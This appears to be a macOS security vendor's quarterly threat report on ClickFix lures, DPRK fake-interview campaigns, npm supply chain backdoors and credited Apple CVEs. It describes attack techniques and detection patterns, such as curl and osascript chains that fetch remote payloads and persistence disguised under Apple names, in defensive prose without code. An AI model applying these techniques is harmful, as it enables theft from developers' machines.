Welcome to the Iru Threat Intelligence Report, our quarterly summary of emerging threats in the macOS ecosystem and how Iru is responding in real time. In each edition, we break down key threat discoveries and the protections we've deployed to keep customer devices secure.
Iru EDR is built to detect threats before they go mainstream. By combining behavioral detections with insights from our own malware research, we're able to protect customers from exploitation even before public disclosures or patches become available. This quarter alone, our security researchers curated and shipped 115 new detection rules, meaningfully expanding coverage across the macOS threat landscape. We also released Device Isolation on macOS EDR, giving responders the ability to cut a compromised Mac off from the network in one click while preserving the connection back to Iru for investigation and remediation.
This quarter, three trends dominated the macOS threat landscape, and they're not slowing down. ClickFix social engineering, DPRK fake interview lures, and software supply chain compromises all surged, often borrowing tradecraft from one another. Our researchers were on every one of them.
Detection: ClickFix, the social engineering trick where users are coached into pasting a malicious command into Terminal, exploded across the macOS ecosystem this quarter. We observed campaigns disguised as fake CAPTCHAs, bogus "reclaim disk space" Apple-themed pages, malvertised ChatGPT and Atlas browser downloads, and typosquatted installer flows targeting crypto wallets. Security Researcher Calvin So published a deep dive on the latest Atomic Stealer (AMOS) wave, including ClickFix delivery, trojanized crypto apps, and a previously undocumented persistence mechanism. Apple shipped a Terminal paste-warning prompt in macOS Tahoe 26.4, and attackers immediately pivoted by abusing Script Editor via URL scheme to sidestep the new control entirely.
Response: ClickFix exploits trust rather than software, which makes behavioral detection essential. Iru EDR flags the parent-child execution chains that define this attack class (Terminal or Script Editor spawning curl, osascript chaining into bash, AppleScript pulling remote payloads) so we catch the activity even when the lure and the payload keep mutating.
Detection: North Korea's Contagious Interview campaign had a busy quarter. Fake recruiters on LinkedIn continue to lure developers, especially in crypto, AI, and Web3, into "technical assessments" that drop BeaverTail, InvisibleFerret, OtterCookie, and FlexibleFerret onto their Macs. The campaign now spans three delivery channels at once: ClickFix-style "fix your camera driver" prompts during fake video interviews, malicious npm packages handed out as coding challenges, and trojanized Visual Studio Code workspaces with malicious task configurations. Calvin So also documented MonetaStealer, an early-stage, AI-assisted infostealer Iru researchers discovered with zero VirusTotal detections at time of analysis, exactly the kind of low-volume, high-novelty payload these recruiter-driven campaigns lean on.
Response: We're tracking the full BeaverTail / InvisibleFerret / FlexibleFerret family across our customer base, including the Qt-compiled BeaverTail variants and the Apple-Developer-signed FlexibleFerret samples that initially slipped past XProtect. If your developers are hiring, getting hired, or doing take-home coding tests, we have you covered.
Detection: Supply chain compromises came hard and fast this quarter. On March 31, attackers hijacked the maintainer account of axios an NPM package with over 100 million weekly downloads, and published two backdoored versions (1.14.1 and 0.30.4) that pulled in a phantom dependency, plain-crypto-js@4.2.1. The malicious dependency dropped a cross-platform RAT (WAVESHAPER.V2) onto macOS, Windows, and Linux. The operation has been linked to a DPRK-aligned actor, closing the loop between the fake-interview activity above and the supply chain itself. Around the same time, Calvin So analyzed MiniRAT, a Go-based macOS RAT delivered via the malicious velora-dex-sdk npm package, with anti-VM checks, LaunchAgent persistence disguised as an Apple component, and AES-encrypted C2. We also published an investigation into Shai-Hulud, the npm worm that resurfaced in 2026 with new "Third Coming" activity targeting Bitwarden CLI and Checkmarx tooling.
Response: A recurring theme across this quarter's supply chain payloads, including the Axios RAT and MiniRAT, is malware masquerading as legitimate Apple system services, dropping artifacts and persistence under com.apple.* names to blend in with the OS. Iru EDR's behavioral detections flag these impersonation patterns regardless of the specific path or filename, so coverage holds even as the next variant shifts where it lands. More broadly, this incident sits inside a larger 2026 wave: TeamPCP's compromises of Trivy, KICS, LiteLLM, and Telnyx in March, the Bitwarden CLI npm impersonation in April, and the ongoing Shai-Hulud worm activity. Developer endpoints are now part of your attack surface in a very real way, and we treat them like the high-value targets they are.
Detection: Beyond the three big trends, our team kept publishing. Calvin So reverse-engineered a macOS DMG loader masquerading as a music plugin. Principal Security Researcher Csaba Fitzl examined the dangers of cracking tools, including a local privilege escalation vulnerability he uncovered in a popular macOS software cracker. Security Researcher Shwena Kak dug into the security implications of OpenClaw and the new class of autonomous AI agents executing shell commands with deep system access, with very real implications for how attackers will weaponize these tools next.
Response: Threat hunting means understanding where attackers will go next, beyond catching what's already circulating. Whether it's AI-assisted infostealers in early development (MonetaStealer), legitimate dev tools being weaponized (cracking utilities, OpenClaw), or DMG loaders hiding in plain sight, our researchers stay on the leading edge so our detections do too.
Iru's vulnerability management work covers both macOS and Windows fleets, and runs on two tracks: original research that ships back upstream to Apple and the broader ecosystem, and detection content that protects customers across the operating systems they actually run. Both were busy this quarter. Iru security researchers added enrichment to 25% of macOS-applicable CVEs and 18.6% of Windows-applicable CVEs this quarter. A blog post coming later this month digs into why this matters, particularly in light of the recent NVD changes to CVE prioritization. We also had the launch of Homebrew detections in vulnerability management!.
Detection: Principal macOS Security Researcher Csaba Fitzl had a strong showing across this quarter's Apple security releases. Six CVEs were credited to Csaba across macOS Tahoe 26.3, macOS Tahoe 26.4, macOS Sonoma 14.8.4, and the corresponding iOS, iPadOS, tvOS, and visionOS releases, including CoreServices root privilege escalation (CVE-2026-20617 and CVE-2026-20615), a sandbox escape (CVE-2026-28827), and a privacy issue, where an attacker could steal protected iCloud documents (CVE-2026-28881). Three additional Apple acknowledgements without CVE assignment rounded out the quarter, covering Captive Network and other components.
Additionally Csaba was credited in Carbon Copy Cloner 7.1.5 for a privacy bypass issue.
Response: When our researchers find vulnerabilities upstream, our customers benefit downstream. Every Apple bug Csaba file is a class of attack we already understand from the inside, which means our detections are tuned for the techniques attackers will reach for next, ahead of what's already in the wild.
Detection: We published an in-depth look at the hidden risks of the Homebrew Cellar, the directory where Homebrew stores every version of every package it has ever installed. For most fleets, the Cellar is a long tail of forgotten older versions sitting alongside the current one, versions Homebrew won't update and standard vulnerability scanners often miss entirely. The result is a meaningful blind spot: a Mac can show as "patched" while still carrying exploitable older binaries on disk, fully executable, fully ignored.
Response: Homebrew is everywhere on developer Macs, and the Cellar is a real coverage gap worth taking seriously. Closing it matters.
The biggest news on the horizon: Windows EDR is coming. We're expanding to Windows fleets: stay tuned to our blog as our coverage expands to Windows threats as well. We also have some speaking engagements coming up for some of our researchers.